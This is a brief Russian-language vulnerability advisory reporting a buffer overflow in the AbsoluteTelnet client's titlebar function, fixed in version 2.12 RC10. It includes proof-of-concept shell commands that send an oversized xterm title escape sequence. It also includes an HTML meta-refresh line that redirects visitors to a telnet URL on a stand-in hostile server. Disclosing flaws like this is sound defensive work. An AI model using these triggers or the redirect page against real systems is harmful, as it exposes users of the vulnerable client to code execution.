Переполнение буфера обнаружено в AbsoluteTelnet. Удаленный атакующий может выполнить произвольный код с пользовательскими привилегиями.
Переполнение обнаружено в функции titlebar. Пример: 

export KNUD=`perl -e ‘print «A» x 174’`
echo -ne «\033]0;$KNUD\007»

export KNUD=`perl -e ‘print «A» x 296’`
echo -ne "\033]0;$KNUD\007"

Если AbsoluteTelnet клиент конфигурирован как telnet клиент по умолчанию, то уязвимость может использоваться через специально сформированную Web страницу. Пример: 

<META HTTP-EQUIV=»Refresh» CONTENT="0;URL=telnet://hostile.serv.er">

Уязвимость обнаружена в AbsoluteTelnet 2.00, 2.11 и устранена в 2.12 RC10

Оставить мнение